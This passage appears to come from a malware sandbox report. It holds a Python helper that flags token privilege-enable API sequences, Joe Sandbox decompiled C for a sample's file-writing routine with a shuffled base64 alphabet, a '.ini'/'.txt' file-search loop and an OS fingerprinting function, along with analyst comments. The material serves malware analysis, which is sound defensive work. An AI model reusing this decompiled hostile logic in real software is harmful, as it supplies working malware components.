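    if name == "OpenProcessToken" and len(a) >= 2 and a[1] is not None:
        return f"OpenProcessToken DesiredAccess={decode_flags(a[1], TOKEN_ACCESS)}"
    if name == "AdjustTokenPrivileges" and len(a) >= 4 and a[3] is not None:
        mode = "DisableAllPrivileges" if a[1] else "apply NewState"
        # BufferLength sizes PreviousState: 4-byte count + 12 bytes per LUID_AND_ATTRIBUTES
        slots = (a[3] - 4) // 12 if a[3] >= 16 else 0
        return f"AdjustTokenPrivileges {mode}, PreviousState holds {slots} privilege(s)"
    if name == "CreateFileW" and len(a) >= 6 and None not in a[1:6]:
        return "CreateFileW access={} share={} disposition={} attrs={}".format(
            decode_flags(a[1], GENERIC_ACCESS), decode_flags(a[2], SHARE_MODE),
            CREATION.get(a[4], hex(a[4])), decode_flags(a[5], FILE_ATTRS))
    return f"{name} args={a}"


PRIV_CHAIN = ("OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges")


def detect_privilege_enable(calls: List[Dict]) -> Optional[Dict[str, Optional[str]]]:
    """Return {stage: ref} when OpenProcessToken(TOKEN_ADJUST_PRIVILEGES) is followed,
    in call order, by LookupPrivilegeValue{A,W} and AdjustTokenPrivileges; else None."""
    found: Dict[str, Optional[str]] = {}
    stage = 0
    for c in calls:
        want = PRIV_CHAIN[stage]
        if not c["name"].startswith(want):
            continue
        if want == "OpenProcessToken":
            access = c["args"][1] if len(c["args"]) > 1 else None
            if access is None or not access & 0x20:   # TOKEN_ADJUST_PRIVILEGES
                continue
        found[want] = c["ref"]
        stage += 1
        if stage == len(PRIV_CHAIN):
            return found
    return None


def summarize(lines: List[str]) -> List[str]:
    calls = [c for c in (parse_api_line(l) for l in lines) if c is not None]
    out = [describe_call(c) for c in calls]
    chain = detect_privilege_enable(calls)
    if chain:
        out.append("privilege-enable sequence at refs " + ", ".join(str(r) for r in chain.values()))
    return out


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_API_LINES)))
```

Two caveats the output makes visible. The sandbox masks pointer and string arguments as "?", so the privilege name passed to LookupPrivilegeValueW is not in the APIs list; in the decompiled body it is produced at runtime by E005D4520(_t28, 0x5f) just before the lookup, so it has to be read from a memory dump or by instrumenting that routine. And E005D2F10 discards the return value of AdjustTokenPrivileges, which returns nonzero even when the caller does not hold the privilege and only signals that through GetLastError() == ERROR_NOT_ALL_ASSIGNED, so the routine proceeds whether or not the privilege was actually enabled.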

                          C-Code - Quality: 79%
                          			E005CA4D0(signed int __edx) {
                          				intOrPtr _t115;
                          				intOrPtr _t116;
                          				void* _t117;
                          				intOrPtr _t119;
                          				intOrPtr _t121;
                          				signed int _t123;
                          				signed int _t132;
                          				signed int _t136;
                          				intOrPtr _t144;
                          				intOrPtr _t146;
                          				void* _t149;
                          				intOrPtr _t150;
                          				intOrPtr _t151;
                          				signed short* _t152;
                          				void* _t154;
                          				intOrPtr _t155;
                          				intOrPtr _t157;
                          				void* _t159;
                          				void* _t163;
                          				void* _t166;
                          				signed int _t172;
                          				signed int _t178;
                          				signed short* _t184;
                          				intOrPtr _t185;
                          				signed int _t187;
                          				char _t190;
                          				signed int _t196;
                          				char _t201;
                          				intOrPtr _t202;
                          				void* _t203;
                          				signed int* _t204;
                          				intOrPtr _t205;
                          				signed int* _t206;
                          				intOrPtr _t212;
                          				signed int _t218;
                          				void* _t220;
                          				void* _t222;
                          				intOrPtr _t223;
                          				void* _t228;
                          				void* _t247;
                          				WCHAR* _t254;
                          				intOrPtr _t256;
                          				intOrPtr _t257;
                          				intOrPtr _t258;
                          				void* _t262;
                          				struct _SECURITY_ATTRIBUTES* _t266;
                          				void* _t273;
                          				intOrPtr _t276;
                          				intOrPtr* _t278;
                          				intOrPtr _t280;
                          				intOrPtr _t281;
                          				intOrPtr _t282;
                          				void* _t284;
                          				void* _t285;
                          				void* _t287;
                          				void* _t288;
                          				void* _t289;
                          				void* _t290;
                          				void* _t291;
                          				void* _t292;
                          				void* _t294;
                          				intOrPtr* _t295;
                          				void* _t296;
                          				intOrPtr* _t298;
                          				void* _t299;
                          				intOrPtr* _t300;
                          				intOrPtr* _t301;
                          				void* _t302;
                          				void* _t303;
                          				void* _t304;
                          				void* _t305;
                          				void* _t306;
                          				intOrPtr* _t307;
                          				void* _t318;
                          
                          				_t234 = __edx;
                          				_t278 =  *((intOrPtr*)(_t288 + 0x548));
                          				if(E005CC430( *_t278) == 0) {
                          					L2:
                          					_t254 = _t288 + 0x130;
                          					E005D4520(_t254, 0x6c);
                          					_t288 = _t288 + 8;
                          					L3:
                          					_t115 =  *0x5d9b40; // 0x0
                          					if(_t115 != 0) {
                          						E005C91E0(_t115);
                          						_t288 = _t288 + 4;
                          					}
                          					_t116 = E005CB7A0(_t254);
                          					_t289 = _t288 + 4;
                          					_t266 = 0;
                          					 *0x5d9b40 = _t116;
                          					_t117 = CreateFileW(_t254, 0xc0000000, 1, 0, 2, 0x80, 0);
                          					 *(_t289 + 4) = _t117;
                          					if(_t117 == 0xffffffff) {
                          						L34:
                          						return _t266;
                          					} else {
                          						_t267 =  *((intOrPtr*)(_t278 + 0xc));
                          						if( *((intOrPtr*)(_t278 + 0xc)) != 0) {
                          							E005C1EA0(_t267);
                          							L005D7400(_t267);
                          							_t289 = _t289 + 4;
                          						}
                          						_t119 = E005C5140(0x10);
                          						_t290 = _t289 + 4;
                          						E005C61A0(_t119, 4, 0x400);
                          						 *((intOrPtr*)(_t278 + 0xc)) = _t119;
                          						_t269 =  *((intOrPtr*)(_t278 + 0x10));
                          						if( *((intOrPtr*)(_t278 + 0x10)) != 0) {
                          							E005C1EA0(_t269);
                          							L005D7400(_t269);
                          							_t290 = _t290 + 4;
                          						}
                          						_t121 = E005C5140(0x10);
                          						_t291 = _t290 + 4;
                          						E005C61A0(_t121, 4, 0x4000);
                          						 *((intOrPtr*)(_t278 + 0x10)) = _t121;
                          						_t123 = E005C8160(_t234);
                          						_t201 = 0;
                          						_t19 =  ~((_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) + (_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) * 8) + 2; // 0x2
                          						_push(_t278);
                          						_push(0);
                          						_push(_t123 + _t19);
                          						_push( *((intOrPtr*)(_t291 + 0x10)));
                          						E005C8A20(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe);
                          						_t292 = _t291 + 0x10;
                          						_t280 = E005C8160(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) - (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						_t132 = E005C8160(_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
                          						 *((intOrPtr*)(_t292 + 0xc)) = _t280;
                          						_t212 = _t132 - (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						_t35 = _t280 + 4; // 0x4
                          						 *((intOrPtr*)(_t292 + 0x24)) = _t212;
                          						 *((intOrPtr*)(_t292 + 0x10)) = _t212 + _t35;
                          						_t136 = E005C8160(_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
                          						_t246 = _t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe;
                          						_t318 =  *0x5d9a80 - _t201; // 0x0
                          						 *((intOrPtr*)(_t292 + 8)) = _t136 - (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						if(_t318 != 0) {
                          							L14:
                          							_t281 =  *((intOrPtr*)(_t292 + 0xc)) + 3;
                          							 *((intOrPtr*)(_t292 + 0x28)) =  *((intOrPtr*)(_t292 + 8)) +  *((intOrPtr*)(_t292 + 0x10)) + 1;
                          							do {
                          								 *((char*)(_t292 + _t201 + 0x230)) = _t201;
                          								_t201 = _t201 + 1;
                          							} while (_t201 != 0x100);
                          							_push( *0x5d9a80);
                          							_push(_t292 + 0x330);
                          							_push(0x100);
                          							_push(_t292 + 0x230);
                          							_t144 = E005C7400(_t292 + 0x330, E005CB110());
                          							_t294 = _t292 + 0x18;
                          							_t202 = _t144;
                          							 *((intOrPtr*)(_t294 + 0x2c)) = 0;
                          							_t256 =  *((intOrPtr*)(_t294 + 0x54c));
                          							_t146 = E005C3CF0(_t294 + 0x2c, _t246, _t256, _t294 + 0x2c);
                          							_t295 = _t294 + 8;
                          							_t266 = 0;
                          							 *_t295 = _t146;
                          							if(_t146 == 0) {
                          								L30:
                          								_t247 =  *(_t295 + 4);
                          								L33:
                          								CloseHandle(_t247);
                          								goto L34;
                          							}
                          							_t216 =  *((intOrPtr*)(_t295 + 0x2c));
                          							if( *((intOrPtr*)(_t295 + 0x2c)) == 0) {
                          								goto L30;
                          							}
                          							 *((intOrPtr*)(_t295 + 0x1c)) = _t202;
                          							 *((intOrPtr*)(_t295 + 0x20)) = _t281;
                          							_t203 =  *(_t295 + 0xc);
                          							_t149 = E005D2E00( *(_t295 + 0xc), _t216, _t146);
                          							_t296 = _t295 + 0xc;
                          							if(_t149 == 0) {
                          								_t247 = _t203;
                          								goto L33;
                          							}
                          							_t150 = E005C3180(0x100, 0);
                          							_push(_t256);
                          							_t257 = _t150;
                          							_push(_t150);
                          							_push(0xa);
                          							_push(6);
                          							_t151 = E005D2C70(_t150, _t246);
                          							_t298 = _t296 + 0x18;
                          							_t282 = _t151;
                          							 *_t298 = _t151;
                          							_t152 = E005C3EB0();
                          							_t247 = _t203;
                          							if(_t152 == 0) {
                          								goto L33;
                          							}
                          							 *_t298 = 0;
                          							 *((intOrPtr*)(_t298 + 0x18)) = _t257;
                          							_t204 = _t298 + 0x30;
                          							_t266 = 0;
                          							_t258 = 0;
                          							_t218 =  *_t152 & 0x0000ffff;
                          							 *((intOrPtr*)(_t298 + 0x14)) = _t282 + _t257;
                          							if(_t218 == 0) {
                          								L24:
                          								_t284 = _t298 + 0x130;
                          								E005D7160(_t284, 0x6d);
                          								_t299 = _t298 + 8;
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push( *((intOrPtr*)(_t299 + 0x14)));
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push(_t284);
                          								_push(0x80);
                          								_push(_t204);
                          								_t154 = E005CF0E0();
                          								_t300 = _t299 + 0x1c;
                          								_t155 = _t154 + _t258;
                          								 *_t300 = _t155;
                          								_push( *0x5d9a80);
                          								_push( *((intOrPtr*)(_t300 + 0x18)));
                          								_push(_t155);
                          								_push(_t300 + 0x3c);
                          								_t157 = E005CB110();
                          								_t301 = _t300 + 0x10;
                          								 *_t301 = _t157;
                          								_t262 =  *(_t301 + 0xc);
                          								_t159 = E005D2E00(_t262,  *((intOrPtr*)(_t301 + 0x18)),  *((intOrPtr*)(_t300 + 0x18)) + _t157 -  *((intOrPtr*)(_t301 + 0x18)));
                          								_t302 = _t301 + 0xc;
                          								if(_t159 == 0) {
                          									_t247 = _t262;
                          									goto L33;
                          								}
                          								_t205 =  *((intOrPtr*)(_t302 + 0x548));
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t302 + 0xc)) + 2);
                          								_push(0);
                          								_push(_t262);
                          								E005C8A20(_t247);
                          								_t303 = _t302 + 0x10;
                          								_t163 = E005C98C0();
                          								_t247 = _t262;
                          								if(_t163 == 0) {
                          									goto L33;
                          								}
                          								_t220 = 0;
                          								while( *((short*)(_t163 + _t220)) != 0) {
                          									_t220 = _t220 + 2;
                          									if(_t220 != 0x400) {
                          										continue;
                          									}
                          									_t266 = 0;
                          									goto L33;
                          								}
                          								_t273 = _t247;
                          								E005CAFA0(_t220, _t247, _t247, _t163, _t220, _t205);
                          								_t304 = _t303 + 0x10;
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t304 + 0x28)));
                          								_push(0);
                          								_t285 = _t273;
                          								_push(_t273);
                          								E005C8A20(_t247);
                          								_t305 = _t304 + 0x10;
                          								_t166 = E005C81B0();
                          								if(_t166 == 0) {
                          									_t266 = 0;
                          									L44:
                          									_t247 = _t285;
                          									goto L33;
                          								}
                          								_t222 = 0;
                          								_t247 = _t285;
                          								while( *((short*)(_t166 + _t222)) != 0) {
                          									_t222 = _t222 + 2;
                          									_t266 = 0;
                          									if(_t222 != 0x400) {
                          										continue;
                          									}
                          									goto L33;
                          								}
                          								E005CAFA0(_t222, _t247, _t247, _t166, _t222, _t205);
                          								_t306 = _t305 + 0x10;
                          								_t266 = 0;
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t306 + 0xc)));
                          								_push(0);
                          								_push(_t247);
                          								E005C8A20(_t247);
                          								_t307 = _t306 + 0x10;
                          								_t223 =  *0x5d9bd4; // 0x128a80
                          								 *_t307 = 0;
                          								if(E005C1B50(_t223, _t307) == 0) {
                          									goto L44;
                          								}
                          								_t224 =  *_t307;
                          								_t247 = _t285;
                          								if( *_t307 != 0) {
                          									E005CAFA0(_t224, _t247, _t247, _t170, _t224, _t205);
                          									_t172 = E005C8160(_t247);
                          									_t104 =  ~((_t172 * 0xcccccccd >> 0x20 >> 2) + (_t172 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
                          									_push(_t205);
                          									_push(_t172 + _t104);
                          									_push(0);
                          									_push(_t285);
                          									E005C8A20(_t172 * 0xcccccccd >> 0x20 >> 2);
                          									_t178 = E005C8160(_t172 * 0xcccccccd >> 0x20 >> 2);
                          									_t112 =  ~((_t178 * 0xcccccccd >> 0x20 >> 2) + (_t178 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
                          									_push(_t205);
                          									_push(0);
                          									_push(_t178 + _t112);
                          									_push(_t285);
                          									E005C8A20(_t178 * 0xcccccccd >> 0x20 >> 2);
                          									_t247 = _t285;
                          									_t266 = 1;
                          								}
                          								goto L33;
                          							}
                          							_t206 = _t298 + 0x30;
                          							_t184 =  &(_t152[1]);
                          							while(1) {
                          								 *_t206 = _t218;
                          								_t204 =  &(_t206[0]);
                          								_t258 =  *_t298 + 1;
                          								 *_t298 = _t258;
                          								if(_t258 > 0x3f) {
                          									goto L24;
                          								}
                          								_t218 =  *_t184 & 0x0000ffff;
                          								_t184 =  &(_t184[1]);
                          								if(_t218 != 0) {
                          									continue;
                          								}
                          								goto L24;
                          							}
                          							goto L24;
                          						} else {
                          							_t185 = E005C3180(0x40, 0);
                          							_t276 = _t185;
                          							 *0x5d9a80 = _t185;
                          							E005CC400(_t185, "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT", 0x40);
                          							_t292 = _t292 + 0x14;
                          							_t287 = 0;
                          							goto L12;
                          							do {
                          								do {
                          									L12:
                          									_t187 = E005C8160(_t246);
                          									_t246 = _t187 * 0x38e38e39 >> 0x20 >> 1;
                          									_t228 = _t187 - (_t187 * 0x38e38e39 >> 0x20 >> 1) + (_t187 * 0x38e38e39 >> 0x20 >> 1) * 8;
                          								} while (_t228 == _t287);
                          								_t246 =  *((intOrPtr*)(_t276 + _t228 + 0x37));
                          								_t190 =  *((intOrPtr*)(_t276 + _t287 + 0x37));
                          								 *((char*)(_t276 + _t287 + 0x37)) =  *((intOrPtr*)(_t276 + _t228 + 0x37));
                          								_t287 = _t287 + 1;
                          								 *((char*)(_t276 + _t228 + 0x37)) = _t190;
                          							} while (_t287 != 9);
                          							goto L14;
                          						}
                          					}
                          				}
                          				_t196 = E005C8160(__edx);
                          				_t234 = _t196 % E005CC430( *_t278);
                          				_t254 =  *(E005C42F0( *_t278, _t196 % E005CC430( *_t278)));
                          				if(_t254 != 0) {
                          					goto L3;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005CA558
                            • Part of subcall function 005C8160: GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169
                          • CloseHandle.KERNEL32(?), ref: 005CA897
                          Strings
                          • HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT, xrefs: 005CA675
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseCountCreateFileHandleTick
                          • String ID: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT
                          • API String ID: 1536596348-2016521663
                          • Opcode ID: 9f1588081c890fdbde6a2c3ffc677863fddf901eb221f512a1ce1adac877be03
                          • Instruction ID: 7157ab78d72ca2f56c91de55ef6a9b20996e4c84234467e2c2267fa5e1136457
                          • Opcode Fuzzy Hash: 9f1588081c890fdbde6a2c3ffc677863fddf901eb221f512a1ce1adac877be03
                          • Instruction Fuzzy Hash: E4D104B1A042096FD721ABA49C46F7B7FD9FFC4718F09452DF84997282EA309D05C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E005CC7C0() {
                          				void* _t70;
                          				void** _t71;
                          				void* _t73;
                          				void* _t74;
                          				int _t75;
                          				void* _t77;
                          				void* _t78;
                          				void* _t79;
                          				signed int _t81;
                          				void* _t83;
                          				intOrPtr _t84;
                          				short* _t86;
                          				signed short* _t88;
                          				void* _t90;
                          				signed int _t92;
                          				void* _t93;
                          				void* _t94;
                          				void* _t95;
                          				void** _t96;
                          				signed int _t97;
                          				void* _t98;
                          				void* _t101;
                          				signed short* _t102;
                          				signed int _t103;
                          				signed int _t104;
                          				void** _t105;
                          				void* _t106;
                          				signed int _t107;
                          				signed int _t108;
                          				signed int _t109;
                          				signed int _t110;
                          				signed int _t111;
                          				signed int _t112;
                          				struct _WIN32_FIND_DATAW* _t113;
                          				signed int _t120;
                          				void** _t124;
                          
                          				_t93 = _t124[0x29c];
                          				_t108 = 0;
                          				if(_t93 != 0) {
                          					_t70 = _t124[0x29b];
                          					 *0x5d9bd4 = _t93;
                          					_t94 = 0xfffffc00;
                          					while(1) {
                          						_t103 =  *(_t70 + _t94 + 0x400) & 0x0000ffff;
                          						if(_t103 == 0) {
                          							break;
                          						}
                          						 *(_t124 + _t94 + 0x658) = _t103;
                          						_t94 = _t94 + 2;
                          						if(_t94 != 0) {
                          							continue;
                          						} else {
                          							 *((short*)(_t124 + _t94 + 0x656)) = 0;
                          						}
                          						goto L67;
                          					}
                          					 *(_t124 + _t94 + 0x658) = 0;
                          					_t71 =  &(_t124[0x96]);
                          					_t95 = 0x200;
                          					while( *_t71 != 0) {
                          						_t71 =  &(_t71[0]);
                          						_t95 = _t95 - 1;
                          						if(_t95 != 0) {
                          							continue;
                          						} else {
                          						}
                          						goto L67;
                          					}
                          					_t111 = 0;
                          					while(1) {
                          						_t104 = _t111;
                          						_t13 = _t111 + 0x5d9ba4; // 0x2a005c
                          						_t112 =  *(_t111 + _t13) & 0x0000ffff;
                          						if(_t112 == 0) {
                          							break;
                          						}
                          						 *(_t71 + _t104 * 2) = _t112;
                          						_t16 = _t104 + 1; // 0x1
                          						_t111 = _t16;
                          						if(_t95 != _t111) {
                          							continue;
                          						} else {
                          							L12:
                          							 *(_t71 + _t104 * 2) = 0;
                          							L13:
                          							_t108 = 0;
                          						}
                          						goto L67;
                          					}
                          					_t113 =  &(_t124[2]);
                          					 *(_t71 + _t104 * 2) = 0;
                          					_t73 = FindFirstFileW( &(_t124[0x96]), _t113);
                          					_t108 = 0;
                          					 *_t124 = _t73;
                          					if(_t73 != 0xffffffff) {
                          						_t74 = 0xfffffc00;
                          						while( *((short*)(_t124 + _t74 + 0x658)) != 0) {
                          							_t74 = _t74 + 2;
                          							if(_t74 != 0) {
                          								continue;
                          							} else {
                          							}
                          							goto L67;
                          						}
                          						 *((short*)(_t124 + _t74 + 0x656)) = 0;
                          						do {
                          							_t108 = 0;
                          							if((_t124[2] & 0x00000010) != 0) {
                          								goto L64;
                          							} else {
                          								_t77 = 0;
                          								_t105 =  &(_t124[0xc]);
                          								_t96 =  &(_t124[0xd]);
                          								while( *_t96 != 0) {
                          									_t77 = _t77 + 2;
                          									_t96 =  &(_t96[0]);
                          									_t105 =  &(_t105[0]);
                          									if(_t77 != 0x400) {
                          										continue;
                          									} else {
                          										L51:
                          										_t108 = 0;
                          										goto L64;
                          									}
                          									goto L67;
                          								}
                          								_t88 = _t96 - 2;
                          								_t108 = 0;
                          								if(_t88 <=  &(_t124[0xd])) {
                          									goto L64;
                          								} else {
                          									_t108 = 0;
                          									_t120 = 0;
                          									if(( *_t88 & 0x0000ffff) != 0x2e) {
                          										_t92 = 1;
                          										while(1) {
                          											_t102 = _t105;
                          											_t120 = _t92;
                          											if(_t102 <=  &(_t124[0xd])) {
                          												break;
                          											}
                          											_t60 = _t120 + 1; // 0x2
                          											_t92 = _t60;
                          											_t105 = _t102 - 2;
                          											if(( *_t102 & 0x0000ffff) != 0x2e) {
                          												continue;
                          											}
                          											break;
                          										}
                          										_t96 =  &(_t102[1]);
                          										_t113 =  &(_t124[2]);
                          									}
                          									if(_t120 != 3) {
                          										goto L64;
                          									} else {
                          										_t106 =  *_t96;
                          										if(_t106 == 0x6e0069) {
                          											if(_t96[1] != 0x69) {
                          												goto L64;
                          											} else {
                          												goto L21;
                          											}
                          										} else {
                          											if(_t106 != 0x780074) {
                          												goto L64;
                          											} else {
                          												if(_t96[1] == 0x74) {
                          													L21:
                          													_t78 = E005C3180(_t77, 0);
                          													_t124 =  &(_t124[2]);
                          													if(_t78 == 0) {
                          														goto L64;
                          													} else {
                          														_t79 = 0xfffffc00;
                          														while(1) {
                          															_t97 =  *(_t124 + _t79 + 0x658) & 0x0000ffff;
                          															if(_t97 == 0) {
                          																break;
                          															}
                          															 *(_t124 + _t79 + 0xa58) = _t97;
                          															_t79 = _t79 + 2;
                          															if(_t79 != 0) {
                          																continue;
                          															} else {
                          																 *((short*)(_t124 + _t79 + 0xa56)) = 0;
                          																goto L13;
                          															}
                          															goto L67;
                          														}
                          														 *(_t124 + _t79 + 0xa58) = 0;
                          														_t98 = 0x200;
                          														_t71 =  &(_t124[0x196]);
                          														while( *_t71 != 0) {
                          															_t71 =  &(_t71[0]);
                          															_t108 = 0;
                          															_t98 = _t98 - 1;
                          															if(_t98 != 0) {
                          																continue;
                          															} else {
                          															}
                          															goto L67;
                          														}
                          														_t109 = 0;
                          														while(1) {
                          															_t104 = _t109;
                          															_t110 =  *(_t124 + 0x34 + _t109 * 2) & 0x0000ffff;
                          															if(_t110 == 0) {
                          																break;
                          															}
                          															 *(_t71 + _t104 * 2) = _t110;
                          															_t40 = _t104 + 1; // 0x1
                          															_t109 = _t40;
                          															if(_t98 != _t109) {
                          																continue;
                          															} else {
                          																goto L12;
                          															}
                          															goto L67;
                          														}
                          														 *(_t71 + _t104 * 2) = 0;
                          														_push(0);
                          														_push( &(_t124[0x197]));
                          														_t81 = E005CC510( &(_t124[0x197]), _t98);
                          														_t124 =  &(_t124[2]);
                          														if(_t81 == 0) {
                          															goto L51;
                          														} else {
                          															_t108 = _t81;
                          															_t90 = 2;
                          															_t83 = 0xffffffffffffffff;
                          															while( *((short*)(_t124 + _t90 + 0x656)) != 0) {
                          																_t83 = _t83 - 1;
                          																_t90 = _t90 + 2;
                          																if(_t83 != 0xfffffdff) {
                          																	continue;
                          																} else {
                          																}
                          																goto L67;
                          															}
                          															_t124[1] = _t83;
                          															_t84 =  *0x5d9b40; // 0x0
                          															if(_t84 != 0) {
                          																E005C91E0(_t84);
                          																_t124 =  &(_t124[1]);
                          															}
                          															_t86 = E005C3180(_t90, 0);
                          															_t124 =  &(_t124[2]);
                          															 *0x5d9b40 = _t86;
                          															if( ~(_t124[1]) <= 0) {
                          																if(_t90 != 0) {
                          																	 *_t86 = 0;
                          																}
                          															} else {
                          																_t101 = 0;
                          																while(1) {
                          																	_t107 =  *(_t124 + _t101 + 0x658) & 0x0000ffff;
                          																	if(_t107 == 0) {
                          																		break;
                          																	}
                          																	 *(_t86 + _t101) = _t107;
                          																	_t101 = _t101 + 2;
                          																	if(_t90 != _t101) {
                          																		continue;
                          																	} else {
                          																		 *((short*)(_t86 + _t101 - 2)) = 0;
                          																	}
                          																	goto L67;
                          																}
                          																 *(_t86 + _t101) = 0;
                          																goto L64;
                          															}
                          														}
                          													}
                          												} else {
                          													goto L64;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							goto L67;
                          							L64:
                          							_t75 = FindNextFileW(_t124[1], _t113);
                          						} while (_t108 == 0 && _t75 != 0);
                          						FindClose( *_t124);
                          					}
                          				}
                          				L67:
                          				return _t108;
                          			}

                          (Instruction address column for the C-Code above, 0x005cc7ca to 0x005ccae4; the line-by-line alignment with the decompiled code did not survive extraction.)

                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 005CC879
                          • FindNextFileW.KERNEL32(?,?), ref: 005CCAA4
                          • FindClose.KERNEL32 ref: 005CCAB5
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Find$FileHeap$AllocateCloseFirstNextProcess
                          • String ID:
                          • API String ID: 2373226758-0
                          • Opcode ID: 954c3b78368ccd6b565e5be55263905b5ef90b821538fad857b3e49073d0df77
                          • Instruction ID: 67cef79809c8ff55a3755a9b5bc408f43831a2fe0b6dc04b5af8e7573cfeb04f
                          • Opcode Fuzzy Hash: 954c3b78368ccd6b565e5be55263905b5ef90b821538fad857b3e49073d0df77
                          • Instruction Fuzzy Hash: 9881CF715083098ED730DB94DC49FABBFA6FF90304F19482ED84E8B2A1EB759841D392
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			// OS fingerprint builder: queries the OS version and the (native) system
                          			// information, then returns a heap string assembled from decoded string IDs
                          			// (OS name, architecture and, when present, service pack). _v692 is an
                          			// OSVERSIONINFOEXW; by offset, _v688 is dwMajorVersion, _v684 dwMinorVersion,
                          			// _v416 wServicePackMajor and _v410 wProductType (1 = VER_NT_WORKSTATION).
                          			E005C1FB0() {
                          				char _v208;
                          				char _v408;
                          				char _v410;
                          				signed short _v416;
                          				signed int _v684;
                          				intOrPtr _v688;
                          				char _v692;
                          				char _v892;
                          				struct _OSVERSIONINFOW* _t40;
                          				intOrPtr _t44;
                          				signed int _t45;
                          				char* _t46;
                          				char* _t49;
                          				void* _t51;
                          				signed int _t59;
                          				void* _t67;
                          				struct _SYSTEM_INFO* _t68;
                          
                          				_t40 =  &_v692;
                          				_t40->dwOSVersionInfoSize = 0x11c; // sizeof(OSVERSIONINFOEXW): the extended struct, so SP and product-type fields are filled
                          				GetVersionExW(_t40);
                          				// 0x5d9d64 holds a dynamically resolved routine (GetNativeSystemInfo, going by
                          				// the API ID below). Without it the code falls back to GetSystemInfo, which
                          				// under WOW64 reports the emulated x86 rather than the real architecture.
                          				if( *((intOrPtr*)( *0x5d9d64)) == 0) {
                          					GetSystemInfo(_t68);
                          				} else {
                          					 *0x5d9d64(_t68);
                          				}
                          				_t44 = _v688; // dwMajorVersion
                          				if(_t44 == 5) {
                          					_t45 = _v684; // dwMinorVersion: 5.0, 5.1 and 5.2 select string IDs 0xa8, 0xa7 and 0xab
                          					if(_t45 == 0) {
                          						_t46 =  &_v892;
                          						_push(0xa8);
                          						goto L30;
                          					}
                          					if(_t45 == 1) {
                          						_t46 =  &_v892;
                          						_push(0xa7);
                          						goto L30;
                          					}
                          					if(_t45 != 2) {
                          						goto L29;
                          					}
                          					_t46 =  &_v892;
                          					_push(0xab);
                          				} else {
                          					if(_t44 == 6) {
                          						_t59 = _v684;
                          						if(_t59 > 3) {
                          							L29: // unrecognised version: generic string 0x9f
                          							_t46 =  &_v892;
                          							_push(0x9f);
                          							L30: // E005D4520(buf, id) decodes the string with the pushed ID into buf
                          							_push(_t46);
                          							E005D4520();
                          							// Architecture. The decompiler mislabels the SYSTEM_INFO field; the word
                          							// compared with 9 (PROCESSOR_ARCHITECTURE_AMD64) is wProcessorArchitecture.
                          							// AMD64 selects string 0xae, anything else string 0xad.
                          							if((_t68->lpMinimumApplicationAddress & 0x0000ffff) != 9) {
                          								_t49 =  &_v408;
                          								_push(0xad);
                          							} else {
                          								_t49 =  &_v408;
                          								_push(0xae);
                          							}
                          							_push(_t49);
                          							E005D4520();
                          							_t51 = E005C3180(0x100, 0); // 256-byte zeroed heap buffer for the result
                          							if(_t51 == 0) {
                          								_t67 = 0; // allocation failed: caller gets NULL
                          							} else {
                          								_t67 = _t51;
